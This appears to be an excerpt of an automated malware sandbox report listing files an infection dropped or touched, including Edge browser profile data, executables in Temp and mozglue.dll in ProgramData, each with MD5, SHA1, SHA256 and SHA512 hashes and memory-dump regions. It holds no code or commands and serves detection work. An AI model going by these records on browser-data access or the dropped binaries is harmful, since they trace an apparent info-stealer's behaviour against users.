SHA256 0f57f52fda6bdf0e8ca022af66b6ccf681a9adfdcca2c8ec8505a171776776cb
SHA512 f3c7dbb25d8586e2464226a223ffe3681157848e4764ade80b68dde8fdcc932555779fc5ceea5e8daa0a9268e47ae1d41293eb50623e025438b6299ed195aca8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe5834f6.TMP

MD5 87e3e4956457ae259917a8e34762679a
SHA1 f63731d5787577645d6d35d0cbf4b11d16408496
SHA256 88c8a787fb2c8bf089cc962199bf27cc9408a559bd9a1e67308d39ff98b9c713
SHA512 182684c577074cfe71d99328a5055c4810b369a5a28b040460c15567480a34f6dabfb7d89f9a924244d1426505ff3daa3520fe9593c4b235343b7404b909b0cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7f5b3a7d7d419b8dc9e3ecfa775dca9c
SHA1 0c91836ef81abe483e106b9a73773147f1fb5e9b
SHA256 9c6ed97f5b9101d583700dbd1b4a21b1f59c9d3cb140ba757442549924ba7a1c
SHA512 deaa00fb70a190369d63ff460a1ee02fef317efbe765b884a6091b13e2a7bbfd92870da11a4e9b4f8dc48a64810b2887b78f8fa81d3d38b37d82661a004a0d51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b35253233ba87b5508fd35bc604600fc
SHA1 f80c3e98d3303e03d1b197128226346f820e31a7
SHA256 dbb4f545286ccbe5a45e6a31cc129d014970d6a823e8bb0505b8db802c0d9552
SHA512 55505cd731cffe79dc01e016f645388fe020641e93d3bea791fcce249e49f9c72dcdd50d6a10bece9dcc5e19f8fe46fda16f9c4133c9eda27ee36e99a72b0ea5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 a25f9c8deff01725dc062e4b88ed96a8
SHA1 b77a645932adfbbfd8668818cad093ed304f15e6
SHA256 f88b3746f370ee054c33dfe23a85baa5bb50dfeaba065cc3bf7996278fa2ab9a
SHA512 f1918c396bed6ab4780ddd4a7cbd29981d9b2bc95307512ba235b42b1ffea1c848afc921db93b5f77e2810631d24dc765cd73fcd70e3730a34b340ed404592f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 c1381b8f2a6e99f8cf1f13e096db8797
SHA1 857673c5fa216607a902f1101f31765ab5b91a48
SHA256 fbd2ab88f8e46b8d30e8094bb1cede21b455dc68ef8263dbcebdade238bff93c
SHA512 5d34813533137e3d2694c8c1712c10c6dc4c5cf06c842cb008e9079322d324649398e3fb6616bc38359986a54d45ec15c17966d96fe2297f9f12f4d0f882a73d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\97cc3678-a3d6-49dd-b84b-f70be97bd271\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

memory/7760-990-0x0000000000400000-0x000000000046F000-memory.dmp

memory/7760-989-0x0000000000590000-0x00000000005EA000-memory.dmp

memory/7760-994-0x0000000074000000-0x00000000747B0000-memory.dmp

memory/2264-995-0x0000000074000000-0x00000000747B0000-memory.dmp

memory/7760-996-0x0000000007640000-0x0000000007650000-memory.dmp

memory/7760-1003-0x0000000008100000-0x0000000008166000-memory.dmp

memory/7760-1007-0x0000000008910000-0x0000000008986000-memory.dmp

memory/7760-1006-0x00000000088A0000-0x00000000088F0000-memory.dmp

memory/7760-1008-0x00000000089F0000-0x0000000008BB2000-memory.dmp

memory/7760-1009-0x0000000008BC0000-0x00000000090EC000-memory.dmp

memory/7760-1012-0x0000000009200000-0x000000000921E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 51c3743b948c0b72484e05a54c77f42c
SHA1 d7bd495de1be2f4fa5fedb7d01e3942803eb8389
SHA256 e95e64300e0d3a6145b818742c70d7198570aa1c3f64a70a67d1ee632656ae33
SHA512 c471f4dcd4399da2ec2da538dac8a8c7ac14aad8efa72b7505923f6f73c3c6f23f987a5cc2ccf8d232fecc3d38419d514679e22ca8ebb86017c2959aba882e24

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8e1899ff3e5a7fe9c04f560c138ea5a4
SHA1 df193616767cb027d0cdf8271a0e4629d57fac29
SHA256 afcbecceec8e55661a7ed2feea52e6b6beb577f87754f7a3092eaffd3cc404a8
SHA512 d2211feccd3f2e0534db42cf57e6b47bbc3d9b1ba50136eb0092c872262e481936c470fc3be7b510d0c8babd61a3abe789e29507690c51b264b64cf816117a15

memory/2264-1029-0x0000000007170000-0x0000000007180000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d9c9b49624f4be3b81ed60f64efc083b
SHA1 7bd9a6a2fe4da3e49691096bb61c9c24c38d38e1
SHA256 511b40cdbee890d6112f0a3d4f7992a49de0e97ec3eaa9443eed6d321c048120
SHA512 b77e98cd6d5f36d4371bec859d6ee26957f0fdeb5921ac565bc4b2dd8ebeae80b72965ecdb7f516f4bbc9a4a5fc0e737375eed1e6e30cccd3e8358ff0690822f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 af2df4de7066793308c9f3d480644b8c
SHA1 acc63e7def79296a66aec49ce5f40507a8b76679
SHA256 676a78ab0c64cae0259c1f2373ad5d6786afab1c92f873c38e4e0c440ac7c38f
SHA512 a6674cbfc297de90182b9b5ce303372ed6f68e5f1d941bc56d6ba0a0935f84e9379e258ce1450cf112563cbe2a2637e0ac70eb775e7e027edef10efe459b9c2d

memory/7760-1073-0x0000000074000000-0x00000000747B0000-memory.dmp

memory/4548-1075-0x00000000003F0000-0x000000000108C000-memory.dmp

memory/4548-1074-0x0000000074000000-0x00000000747B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/3488-1084-0x0000026B2DD50000-0x0000026B2DE3E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 f13cf6c130d41595bc96be10a737cb18
SHA1 6b14ea97930141aa5caaeeeb13dd4c6dad55d102
SHA256 dd7aaf7ef0e5b3797eaf5182e7b192fa014b735e129e00e0c662829ce0c2515f
SHA512 ccd4f57b1af1f348fcf9f519a4789c04b499ac5e02ccb7333d0a42fa1cb1fdf9f969103b3a5467e278cd5c6cbbbbebaac4577d0c220e13335575a13408c79b48

memory/3488-1089-0x0000026B48280000-0x0000026B48360000-memory.dmp

memory/3488-1091-0x0000026B483F0000-0x0000026B484D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6f38e2c344007fa6c5a609f3baa82894
SHA1 9296d861ae076ebddac76b490c2e56fcd0d63c6d
SHA256 fb1b0639a3bdd51f914bf71948d88555e1bbb9de0937f8fa94e7aa38a8d6ab9f
SHA512 5432ab0139ee88a7b509d60ed39d3b69f7c38fe94613b3d72cc4480112d95b2cbf7652438801e7e7956aca73d6ebc870851814bec0082f4d77737a024990e059

memory/3488-1102-0x0000026B483E0000-0x0000026B483F0000-memory.dmp

memory/3488-1104-0x0000026B486A0000-0x0000026B48768000-memory.dmp

memory/3488-1109-0x0000026B48770000-0x0000026B487BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 a98f00f0876312e7f85646d2e4fe9ded
SHA1 5d6650725d89fea37c88a0e41b2486834a8b7546
SHA256 787892fff0e39d65ccf86bb7f945be728287aaf80064b7acc84b9122e49d54e6
SHA512 f5ca9ec79d5639c06727dd106e494a39f12de150fbfbb0461d5679aed6a137b3781eedf51beaf02b61d183991d8bca4c08a045a83412525d1e28283856fa3802

memory/3488-1101-0x0000026B484D0000-0x0000026B48598000-memory.dmp

memory/3488-1093-0x00007FF92F630000-0x00007FF9300F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\forc.exe

MD5 02d1af12b47621a72f44d2ae6bb70e37
SHA1 4e0cc70c068e55cd502d71851decb96080861101
SHA256 8d2a83ac263e56c2c058d84f67e23db8fe651b556423318f17389c2780351318
SHA512 ecf9114bbac62c81457f90a6d1c845901ece21e36ca602a79ba6c33f76a1117162175f0ace8ae6c2bdc9f962bd797ab9393316238adbc3b40a9b948d3c98582c

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 2a3b76a124f94649eae5583e67712fb4
SHA1 a7ab8fa04f7a843f77dfcca26dc828d257060b05
SHA256 f61f1e6d938431f7d3d73e95561058024ccba80173d610b883b3944327b85eb8
SHA512 065a5c7c7e07db15fcc78abb1d304777458d624c7ee6b73bc7eb16d34faaa96502e4d7d2a76d57b7c1dcc529fd2454ec1c4cfb3309a2cc06da761191c5db67fc

memory/7160-1129-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

memory/7204-1130-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/2484-1126-0x00000000000F0000-0x000000000031D000-memory.dmp

memory/7204-1133-0x0000022F58970000-0x0000022F58A54000-memory.dmp

memory/4548-1136-0x0000000074000000-0x00000000747B0000-memory.dmp

memory/7204-1135-0x00007FF92F630000-0x00007FF9300F1000-memory.dmp

memory/7204-1138-0x0000022F40080000-0x0000022F40090000-memory.dmp

memory/3488-1137-0x00007FF92F630000-0x00007FF9300F1000-memory.dmp

memory/7204-1140-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1139-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1142-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1144-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1146-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1148-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1150-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1152-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1156-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1154-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1158-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1160-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1162-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1164-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1166-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1169-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1171-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1173-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/2484-1175-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/7204-1177-0x0000022F58970000-0x0000022F58A51000-memory.dmp

memory/7204-1181-0x0000022F58970000-0x0000022F58A51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 754e4cbc6361a7a2dddc336007017c05
SHA1 e8666f160f122a22d13610ccbf51db39ebd9a683
SHA256 12ce79ca5ecea8d80a53eddd83f3b6ad6af56315400f4e5120861c36f569e14b
SHA512 1a5221167f951bbf73122e6394b4c1bdafdc7b6aa88fbae1023d4f6efc02a4199ea10a185440fe41d4d55684b020322486298bd5f4342419f17827b749497e64

memory/8156-1233-0x0000000000840000-0x0000000000940000-memory.dmp

memory/8156-1235-0x0000000000820000-0x0000000000829000-memory.dmp

memory/7932-1241-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2804-1269-0x0000000002A60000-0x0000000002E63000-memory.dmp

memory/2804-1272-0x0000000002E70000-0x000000000375B000-memory.dmp

memory/2804-1276-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/7932-1481-0x0000000000400000-0x0000000000409000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2484-1812-0x00000000000F0000-0x000000000031D000-memory.dmp

memory/7224-1846-0x0000000002740000-0x0000000002776000-memory.dmp

memory/7224-1851-0x0000000002890000-0x00000000028A0000-memory.dmp

memory/7160-1853-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

memory/7224-1856-0x0000000002890000-0x00000000028A0000-memory.dmp

memory/7224-1855-0x0000000004EF0000-0x0000000005518000-memory.dmp

memory/7224-1849-0x0000000074000000-0x00000000747B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axsa3t24.qta.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/7224-1879-0x0000000004E60000-0x0000000004E82000-memory.dmp

memory/7224-1887-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/7224-1893-0x00000000058F0000-0x0000000005C44000-memory.dmp

memory/7224-1910-0x0000000005D50000-0x0000000005D6E000-memory.dmp

memory/7224-1942-0x0000000006220000-0x0000000006264000-memory.dmp

memory/7204-1967-0x0000022F40080000-0x0000022F40090000-memory.dmp

memory/7204-1966-0x00007FF92F630000-0x00007FF9300F1000-memory.dmp

memory/7224-1990-0x0000000007790000-0x0000000007E0A000-memory.dmp

memory/7224-1992-0x0000000007110000-0x000000000712A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7A28.tmp

MD5 d6a7ae3a2f09496281de0b629ea5f1cf
SHA1 905a7d605b9be4400cfcce80f7c25c19b75f1080
SHA256 1d89d368ab8de66d630a070c6fae2ca03b883548bb074e9339132de8f15c37f6
SHA512 8f2cbb40a5a1a87e554751fc1e7d23f7e85ac6e0740012d6603821411847108b93b03505e548ae10d5bb44402cbb7039feb6b3f937331cc33782102f10917225

C:\Users\Admin\AppData\Local\Temp\tmp840A.tmp

MD5 4bd8313fab1caf1004295d44aab77860
SHA1 0b84978fd191001c7cf461063ac63b243ffb7283
SHA256 604e2ecd34c77664dae4ceb0dab0b3e4bb6afb2778d3ed21f8d8791edd1408d9
SHA512 ca96d92a8abbd3a762e19f8e77514ee0018b7e5dc21493c37e83e22047b3cc892eced2fc80b78e6861bb972e20b93007eb46bcb7b562965be2bfa98a24c2ed65

C:\Users\Admin\AppData\Local\Temp\tmp83F6.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp8456.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp846B.tmp

MD5 df335983f59625aa622bdffed02fc7de
SHA1 530e46ae4cba354e7413c484d1a4795368c5ddc8
SHA256 a30989303d3ce8678bf43d44d2471b484bf7cacc2892b99be4dbf8f4000a609d
SHA512 ea7fec8a7a17ff9744ed9a9acdbc53933b5965d8897bf41d57802f301abf1520c19291df79b82bf663a8e67587310b73a46351135a63559b37214775c3f5b28b

C:\Users\Admin\AppData\Local\Temp\tmp84AB.tmp

MD5 47d978aaa4d64944095bb9498e028ebb
SHA1 5ff01013c82906fd7af70645cf4065c07c00ea4f
SHA256 ed999464c7aec29892b6846e65bad4aa5a61a4cd15872a0ac2cf10b9872fab4e
SHA512 3898ad5d6cba6b75ea0729b792fe0a5238c795bf2dbdd1b06b0342f0fe814ba6b137cf6c6a0f3ae62deef27e2714eb5a1b435ff50c24885e31b7b3afe22c3398

C:\Users\Admin\AppData\Local\Temp\tmp84D6.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77